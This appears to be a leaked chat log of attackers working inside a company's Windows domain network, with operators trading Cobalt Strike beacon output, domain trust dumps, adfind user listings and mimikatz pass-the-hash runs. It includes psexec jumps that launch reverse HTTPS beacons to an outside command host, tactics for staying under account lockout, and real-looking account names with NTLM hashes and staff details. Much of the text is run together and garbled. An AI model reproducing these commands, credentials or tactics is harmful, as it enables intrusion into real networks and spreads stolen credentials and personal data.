Country/region code          000 (System Default)
Account active               Yes
Account expires              Never
Password last set            30/08/2018 6:46:28 PM
Password expires             11/10/2018 6:46:28 PM
Password changeable          31/08/2018 6:46:28 PM
Password required            Yes
User may change password     Yes
Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never
Logon hours allowed          All
Local Group Memberships
Global Group memberships     *Domain Users         *Domain Admins
The command completed successfully.
```
``net user, give it the token``
yes
from which the account is active?
and what is the error?
with "c360.local" dir also does not give output with the token
YES (account is active, credentials are valid)
```
beacon> shell dir \\10.195.13.14\c$
[*] Tasked beacon to run: dir \\10.195.13.14\c$
[+] host called home, sent: 52 bytes
[+] received output:
Access is denied.
```
``I tried it on 3 different machines``
```
beacon> shell tasklist /s 10.225.10.215 /v
[*] Tasked beacon to run: tasklist /s 10.225.10.215 /v
[+] host called home, sent: 59 bytes
```
What? RDS? Is there a CmRcService on the Terminal Server?
Does it have >memberOf: CN=Terminal Server License Servers,CN=Builtin,DC=datacenter,DC=local
@tl1 if the PC has OU=Corporate IT, is it possible to put it into such a subgroup when sorting?
services from AD, processes are pulled when nothing is clear from the AD info: list of processes, its group, description in AD, etc.
viewing the group policies for the sake of understanding the structure of the network - just a great idea
and what method exactly do you mean?
and what kind of information is needed that is so special?
ah, well, yes, I did a separate thread ... at least these went into quarantine ...
dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time >name: c360.local >securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``We've had a change in communications, it was in the forum.`` dn:CN=80-20.com,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2008/04/03-15:34:59 AUS Eastern Daylight Time >name: 80-20.com >securityIdentifier: S-1-5-21-789336058-1343024091-1417001333 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: 80-20.com >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=legalco.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2010/06/02-15:05:33 AUS Eastern Daylight Time >name: legalco.local >securityIdentifier: S-1-5-21-1275210071-2025429265-1417001333 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: legalco.local >trustType: 2 [UpLevel(2) >trustAttributes: 68 [Quarantined-Domain(4);Treat-External(64)] dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time >name: frd.global >securityIdentifier: S-1-5-21-2724714270-1340506477-316473475 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: frd.global >trustType: 2 [UpLevel(2) >trustAttributes: 32 [Within-Forest(32)] dn:CN=Anstat.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2007/07/03-13:18:37 AUS Eastern Daylight Time >name: Anstat.local >securityIdentifier: S-1-5-21-295181386-3567791559-1353306441 >trustDirection: 3 
[Inbound(1);Outbound(2) >trustPartner: Anstat.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=leaders.frd.global,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2011/01/18-14:59:38 AUS Eastern Daylight Time >name: leaders.frd.global >securityIdentifier: S-1-5-21-888074932-249386324-1990136273 >trustDirection: 1 [Inbound(1) >trustPartner: leaders.frd.global >trustType: 2 [UpLevel(2) >trustAttributes: 32 [Within-Forest(32)] dn:CN=standards.com.au,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2006/04/18-13:02:07 AUS Eastern Daylight Time >name: standards.com.au >securityIdentifier: S-1-5-21-8915387-1104766828-763373030 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: standards.com.au >trustType: 2 [UpLevel(2) >trustAttributes: 0 [] dn:CN=saig.frd.global,CN=System,DC=frd,DC=global >whenCreated: 2006/03/20-15:18:22 AUS Eastern Daylight Time >name: saig.frd.global >securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: saig.frd.global >trustType: 2 [UpLevel(2) >trustAttributes: 32 [Within-Forest(32)] dn:CN=ad-apse2.np.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2017/05/19-14:26:44 AUS Eastern Daylight Time >name: ad-apse2.np.aws.saig >securityIdentifier: S-1-5-21-199586283-846828525-2273482586 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-apse2.np.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=ad-usea1.np.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2017/07/11-17:21:06 AUS Eastern Daylight Time >name: ad-usea1.np.aws.saig >securityIdentifier: S-1-5-21-3403532533-1899797052-316633242 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-usea1.np.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=ad-apse2.build.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2017/07/12-11:16:33 AUS Eastern Daylight Time >name: ad-apse2.build.aws.saig >securityIdentifier: 
S-1-5-21-2542211190-1088484194-4279143674 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-apse2.build.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=ad-euce1.prd.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2017/11/08-13:27:58 AUS Eastern Daylight Time >name: ad-euce1.prd.aws.saig >securityIdentifier: S-1-5-21-3050823117-3304142573-3876120398 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-euce1.prd.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=ad-usea1.prd.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2018/01/15-20:16:54 AUS Eastern Daylight Time >name: ad-usea1.prd.aws.saig >securityIdentifier: S-1-5-21-2974031555-4010838971-2461281460 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-usea1.prd.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=datacenter.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/14-00:59:37 AUS Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=c360uk.local,CN=System,DC=frd,DC=global >whenCreated: 2018/04/17-20:20:15 AUS Eastern Daylight Time >name: c360uk.local >securityIdentifier: S-1-5-21-2060452117-3986949954-748576278 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360uk.local >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/07-15:56:50 AUS Eastern Daylight Time >name: SaigProd.local >securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: SaigProd.local >trustType: 2 [UpLevel(2)] >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=c360.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/08-09:25:57 AUS Eastern Daylight Time 
>name: c360.local >securityIdentifier: S-1-5-21-2457170381-1748207559-2678280483 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=datacenter.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time >name: datacenter.local >securityIdentifier: S-1-5-21-3425310730-2254951293-3528185534 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: datacenter.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/07/23-20:59:31 AUS Eastern Daylight Time >name: c360uk.local >securityIdentifier: S-1-5-21-2060452117-3986949954-748576278 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360uk.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=ad-apse2.prd.aws.saig,CN=System,DC=frd,DC=global >whenCreated: 2019/07/24-18:10:06 AUS Eastern Daylight Time >name: ad-apse2.prd.aws.saig >securityIdentifier: S-1-5-21-3745473896-2843996748-977219772 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: ad-apse2.prd.aws.saig >trustType: 2 [UpLevel(2) >trustAttributes: 8 [Transitive(8)] 19 Objects returned Well, now that you mention processcolour here you go https://github.com/icebearfriend/Quickrundownувы, it's wildly tedious pdf, but sometimes if you shine on it a bit - informative) if it processcolor.cna skidykaGood for you, it's more about trusts and attributes and stuffxD hope that something else can shoot hell...Lolno we did not throw it specially you can take in one command all the trusts in the domain now I will throw you a cool thing which I should have given long ago ... 
but okay at least did samosamokriticheskoe xDda I'm a stupid animal what can I say here was with *[ ](https://mediaeveryone.com/group/saiglobal-com?msg=RhSbHC2uoMM5zoivr) 100% was a session under the admin and you tried to bypass the yuak yes? user 2-2[AUHDC1-SPPDC01]SYSTEM */4576|2020Oct06 01:15:50> net domain_trusts [*] Tasked beacon to run net domain_trusts [+] host called home, sent: 104513 bytes [+] received output: List of domain trusts: 0: SAIG saig.frd.global (Direct Outbound) (Direct Inbound) 1: SAIGPROD saigProd.local (Forest tree root) (Primary Domain) (Native) `````` >trustAttributes: 32 [Within-Forest(32)] ``` In a forest, respectively, it can be a trustA transitive trust is a trust that is extended not only to a child object, but also to each object that the child trusts. (In contrast, a non-transitive trust extends only to one object.) there's a session under local polzak or somethinga it's ok so are you an admin? I can't get a system on datacenter.local, it's win serv 2016 ``` beacon> elevate svc-exe [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) via Service Control Manager (\127.0.0.1\ADMIN$\b59b87e.exe) [+] host called home, sent: 291370 bytes [-] Could not start service b59b87e on .: 225 ``` what to do? 
```
beacon> shell ping -n 1 frd.global
[*] Tasked beacon to run: ping -n 1 frd.global
[+] host called home, sent: 51 bytes
[+] received output:
Pinging frd.global [10.225.12.1] with 32 bytes of data:
Reply from 10.225.12.1: bytes=32 time<1ms TTL=128
Ping statistics for 10.225.12.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms
```

```
beacon> shell ping frd.global
[*] Tasked beacon to run: ping frd.global
[+] host called home, sent: 46 bytes
[+] received output:
Pinging frd.global [10.195.25.98] with 32 bytes of data:
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Reply from 10.195.25.98: bytes=32 time=206ms TTL=123
Ping statistics for 10.195.25.98:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 206ms, Maximum = 206ms, Average = 206ms
```

@tl2 tell me please, the difference between transitive and forest?
This is from the current one:

```
dn:CN=frd.global,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2006/03/20-00:18:22 Eastern Daylight Time >name: frd.global >securityIdentifier: S-1-5-21-2724714270-1340506477-316473475 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: frd.global >trustType: 2 [UpLevel(2)] >trustAttributes: 32 [Within-Forest(32)]
```

Oh, transitive. + sees it?

```
dn:CN=frd.global,CN=System,DC=datacenter,DC=local >whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time >name: frd.global >securityIdentifier: S-1-5-21-2724714270-1340506477-316473475 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: frd.global >trustType: 2 [UpLevel(2)] >trustAttributes: 8 [Transitive(8)]
```

`datacenter.local`

```
dn:CN=saig.frd.global,CN=System,DC=datacenter,DC=local >whenCreated: 2018/06/09-00:59:39 AUS Eastern Daylight Time >name: saig.frd.global >securityIdentifier:
S-1-5-21-2959458370-3657645319-1944215935 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: saig.frd.global >trustType: 2 [UpLevel(2)] >trustAttributes: 4 [Quarantined-Domain(4)] dn:CN=frd.global,CN=System,DC=datacenter,DC=local >whenCreated: 2018/04/14-00:59:25 AUS Eastern Daylight Time >name: frd.global >securityIdentifier: S-1-5-21-2724714270-1340506477-316473475 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: frd.global >trustType: 2 [UpLevel(2)] >trustAttributes: 8 [Transitive(8)]
```

The rest of them? Yeah, there's only a reverse trust. c360.local:

```
Using server: AUHDC1-C360-DC1.c360.local:3268 Directory: Windows Server 2012 R2 dn:CN=saig.frd.global,CN=System,DC=c360,DC=local >whenCreated: 2018/06/08-09:22:10 AUS Eastern Daylight Time >name: saig.frd.global >securityIdentifier: S-1-5-21-2959458370-3657645319-1944215935 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: saig.frd.global >trustType: 2 [UpLevel(2)] >trustAttributes: 4 [Quarantined-Domain(4)] 1 Objects returned
```

Are there any more trusts available in this domain among your trusts? Yes, except for one of them. Did you take the trusts off in the "taken" domains?

```
dn:CN=SaigProd.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/06/07-00:56:50 Eastern Daylight Time >name: SaigProd.local >securityIdentifier: S-1-5-21-3702894564-3969952199-2128771015 >trustDirection: 3 [Inbound(1);Outbound(2)] >trustPartner: SaigProd.local >trustType: 2 [UpLevel(2)] >trustAttributes: 4 [Quarantined-Domain(4)]
```

And I asked you not to touch quarantines; at least that one is in quarantine.
dn:CN=c360uk.local,CN=System,DC=saig,DC=frd,DC=global >whenCreated: 2018/07/23-05:59:31 Eastern Daylight Time >name: c360uk.local >securityIdentifier: S-1-5-21-2060452117-3986949954-748576278 >trustDirection: 3 [Inbound(1);Outbound(2) >trustPartner: c360uk.local >trustType: 2 [UpLevel(2) >trustAttributes: 4 [Quarantined-Domain(4)] ``top)= )waaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa beacon> shell dir \\10.225.10.201\c$ [*] Tasked beacon to run: dir \\10.225.10.201\c$ [+] host called home, sent: 53 bytes [+] received output: Volume in drive \10.225.10.201\c$ has no label. Volume Serial Number is 2AC9-2F68 Directory of \10.225.10.201$ 14/03/2019 04:03 AM PerfLogs 29/08/2020 03:26 AM Program Files 14/03/2019 04:14 AM Program Files (x86) 29/08/2020 03:26 AM Temp 29/08/2020 02:52 AM Users 06/10/2020 08:42 AM Windows 0 File(s) 0 bytes 6 Dir(s) 49,648,717,824 bytes free ``You tested with ipac smb_login, try it with the IP address``` beacon> shell dir \\\datacenter.local\c$ [*] Tasked beacon to run: dir \\datacenter.local\c$ [+] host called home, sent: 56 bytes [+] received output: The system cannot find the file specified. see the folders - you can copy the dll and run it with wmik or something then I see no problem to do a pth and check `dir \\\datacenter.local\c$```` [+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\adm.brodan0:aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6' Administrator [+] 10.225.10.201:445 - 10.225.10.201:445 - Success: 'datacenter.local\svc.sccmcliinst:aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67' Administrator Give me the results of the smb_login. How are the admins? Are they valid? Did I run them all in smb_login one at a time? Check the validity, just check the error number first. Did you check the smb_login? I guess that's not what's wrong? 
beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214281 bytes [+] received output: Started service a7c3be0 on datacenter.local [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2 beacon> jump psexec64 datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (\datacenter.local\ADMIN$\1f2a452.exe) [+] host called home, sent: 291406 bytes [-] Could not start service 1f2a452 on datacenter.local: 225 ``with the first jump not done ``datacenter.local DA:`` ``` svc.sccmcliinst aa9249f57aba289658fde8afe795fd67 adm.brodan0 06290576382001cd1da4c942e9fa0ca6 ``@user8 you can also go through smblogin to open the domain from the domain you opened in the report too the credentials are valid``. beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214281 bytes [+] received output: Started service a7c3be0 on datacenter.local [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 2 \DYA - admin's domainDYA - admin's domain, then do as he said? \pth "remote domain"\YA hash@user7 did you do what? with the domain or as LA? jump or smb_logs more than the ones you already checked then one more try, one, maximum 2 you tried less than 5 times in total on each one, right? Lockout threshold: 10 what is the password policy in the current domain? and before that? these two have now tried one at a time on the jump, brute force does not run you can for the total number of fails and lock accounts how many brute force? i asked another question in smb_login? 
or rather i made a mistake and it for ALL domains the same and it is not necessary) so i as a search, there is 1 part of the hash from the wrong domain how much has tried?did not try 2[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so i asked[ ](https://mediaeveryone.com/group/saiglobal-com?msg=bP3Y7mjhGBpcKyw7P) so you had 10 admins there? ok a session in the slip, so if anything there drop a session on a distant server did you do through pth the same? and then there came hashes above? dunne 0/2dozhennye all jumped others? beacon> pth datacenter.local\adm.barsmr0 fabb67c5be20e99698dbc77e751afb3f [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.barsmr0 /domain:datacenter.local /ntlm:fabb67c5be20e99698dbc77e751afb3f /run:"%COMSPEC% /c echo d19dee36172 > \.\pipe\eb999d" command [+] host called home, sent: 438886 bytes [+] Impersonated NT AUTHORITY\SYSTEM [+] received output: user : adm.barsmr0 domain : datacenter.local program : C:\Windows\system32\cmd.exe /c echo d19dee36172 > \.\pipe\eb999d impers. : no NTLM : fabb67c5be20e99698dbc77e751afb3f | PID 836 | TID 1784 | LSA Process is now R/W | LUID 0 ; 1753376140 (00000000:6882658c) \_ msv1_0 - data copy @ 000000EAA17DC2B0 : OK ! 
\_ kerberos - data copy @ 000000EABD39BA68 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \des_cbc_md5 -> null \_ des_cbc_crc -> null \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000000EAA17D1D98 (16) -> null beacon> jump psexec_psh datacenter.local https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on datacenter.local via Service Control Manager (PSH) [+] host called home, sent: 214268 bytes [-] Could not open service control manager on datacenter.local: 5 [-] Could not connect to pipe (\datacenter.local\pipe\status_d482): 1909 ``` ``` beacon> rev2self [*] Tasked beacon to revert token beacon> pth datacenter.local\adm.taydav1 24aa312899f051fbc1a5b464de82c802 [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:adm.taydav1 /domain:datacenter.local /ntlm:24aa312899f051fbc1a5b464de82c802 /run:"%COMSPEC% /c echo 3a6015fae67 > \.\pipe\9f382d" command [+] host called home, sent: 31 bytes beacon> jump psexec_psh USHDC1-CSPADS02 https [*] Tasked beacon to run windows/beacon_https/reverse_https (firedi.com:443) on USHDC1-CSPADS02 via Service Control Manager (PSH) [+] host called home, sent: 653145 bytes [+] Impersonated NT AUTHORITY\SYSTEM [-] Could not open service control manager on USHDC1-CSPADS02: 1722 [-] Could not connect to pipe (\USHDC1-CSPADS02\pipe\status_d482): 53 [+] received output: user : adm.taydav1 domain : datacenter.local program : C:\Windows\system32\cmd.exe /c echo 3a6015fae67 > \.\pipe\9f382d impers. : no NTLM : 24aa312899f051fbc1a5b464de82c802 | PID 6972 | TID 6260 | LSA Process is now R/W | LUID 0 ; 1752989744 (00000000:687c8030) \_ msv1_0 - data copy @ 000000EAA17DD480 : OK ! 
\kerberos - data copy @ 000000EABD39BD78 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \des_cbc_md5 -> null \_ des_cbc_crc -> null \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000000EAA18BC2F8 (16) -> null ``From the 3rd trust there are no common adminsWhy with my number of LA hash only on `` Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: ``search for >infoad_users? also the field in the dump ADinfo it? there LA sometimes leave creeds in the description can also look in ad_computers in info also empty? but it doesn't have to be)))) and descriptors from the same place I looked not from the datacenter, but from the primary domain :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup: :thumbsup:that's what's above,kzzzzzznm``` beacon> shell adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt [*] Tasked beacon to run: adfind.exe -b dc=c360,dc=local -f "(objectcategory=person)" > C:\Windows\temp\Eula_c360.txt [+] host called home, sent: 122 bytes [+] received output: AdFind V01.49.00.00cpp Joe Richards (joe@joeware.net) February 2015 ldap_get_next_page_s: [AUSYDHC-ESP-DC1.legalco.local] Error 0xa (10) - Referral `````` >description: Owner: Ludwina Kleiss (REQ0109502) >sAMAccountName: conveyancing >memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global ``` ``` >description: AMS Contractor (obsolete?) 
>cn: Robert Hair "samaccountname" and "memberof" no dn:CN=Robert Hair,OU=Contacts,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: REQ0326018 Expiration date: 21/07/2020 (US00021RAP) >sAMAccountName: shayog0 "memberof" no dn:CN=Yogesh Sharma,OU=Contractor,OU=Alpharetta,OU=Users,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: REQ0341109 Expiration date: 14/10/2020 (US00040RAP) >sAMAccountName: mokmil0 >memberOf: CN=SG-GLOBAL-Horizon-QA Salesforce,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-AMER-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-Horizon-POOL4,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-EMEA-Horizon-POOL1,OU=VMware Horizon,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Intune,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Pulse Secure VPN,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Dropbox Users,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=DL-Azure-EVCloudSync,OU=Static,OU=Global,OU=Distribution Groups,OU=Control,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Jira_Cloud-Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-Confluence_Users,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-MFA Okta Verify,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SAIG - OneDrive User Policy,OU=APAC,OU=VDI,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-M365 License-Standard,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf:
CN=DL-STANDARDS-APPSENG-APAC Digital CI Team,OU=Groups - Distribution,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Jira_Cloud-User,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Okta-0365 Core Applications,OU=Okta,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-OKTA-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-WPFB-Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-Azure-Saiglb Users,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Americas-Citrix-Remote-PC,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-SP_Hexaware,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-Citrix-W8VDI_120GB,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Security Training,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Tosca_User-Prod,OU=SCCM 2012,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-MFA_Gateway,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-GLOBAL-Confluence_User-Prod,OU=Security Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=SG-Global-WSG-General Internet Access,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=SG-APAC-FPS-Developers,OU=Groups - Security,OU=APAC,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=DL-REG_APAC,OU=Distribution Groups,OU=Groups,OU=0.SAI Global,DC=saig,DC=frd,DC=global ``` ``` >description: WebSense manager (copwsg05) service account >sAMAccountName: svc.websense "memberof" no dn:CN=Websense Service,OU=AsiaPac,OU=~Service Accounts,DC=saig,DC=frd,DC=global ``` ``` >description: Used for N-Cenral Scanning (CHG0045156) >sAMAccountName: svc.ncentral 
>memberOf: CN=SAIG Corporate IT SCCM Read Only,OU=~ Global Security Groups,DC=saig,DC=frd,DC=global >memberOf: CN=APAC vCenter ReadOnly,OU=~ Admin Groups - Restricted Access,DC=saig,DC=frd,DC=global >memberOf: CN=SG-AMER-VCENTER-Read Only,OU=Groups - Security,OU=Americas,OU=0.SAI Global,DC=saig,DC=frd,DC=global >memberOf: CN=Domain Admins,CN=Users,DC=saig,DC=frd,DC=global ``it's just a matter of selecting and scrolling or by pass passw passwd pass :and each one has a description? scroll down and read everything? so if it's like 3k+ users or whatever)or via -it can be listed in ()I have nothing like pwd, password, pass in the description by the way, and if all these trusts are removed - have you looked at the description and info fields ``? saiglobal.com\adm.barsmr0 aad3b435b51404eeaad3b435b51404ee:fabb67c5be20e99698dbc77e751afb3f saiglobal.com\adm.brodan0 aad3b435b51404eeaad3b435b51404ee:06290576382001cd1da4c942e9fa0ca6 saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802 saiglobal.com\adm.bisfra0 aad3b435b51404eeaad3b435b51404ee:6778ead5a63d0e8da0a2235147af85a0 saiglobal.com\adm.brodav1 aad3b435b51404eeaad3b435b51404ee:4f1ef28113c7375b22d3f31bd294fa4e saiglobal.com\adm.evamar1 aad3b435b51404eeaad3b435b51404ee:65a8bca59e4205fc94ed31e11f78d4ac saiglobal.com\adm.kalnic0 aad3b435b51404eeaad3b435b51404ee:d9c4c5a3dca649913994767d6276b9f9 saiglobal.com\adm.kinzac1 aad3b435b51404eeaad3b435b51404ee:52ab4557416b5fd8dfeed6e329db05fb saiglobal.com\adm.turime0 aad3b435b51404eeaad3b435b51404ee:2a0974987cad16892cf57c3f3646e1ea saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67 saig.frd.global\adm.taydav1 aad3b435b51404eeaad3b435b51404ee:24aa312899f051fbc1a5b464de82c802 saig.frd.global\svc.msmap aad3b435b51404eeaad3b435b51404ee:c54366d3aa3826eea0441de8d24a97ee saig.frd.global\svc.sccmcliinst aad3b435b51404eeaad3b435b51404ee:aa9249f57aba289658fde8afe795fd67 saig.frd.global\svc-apac-ems-search 
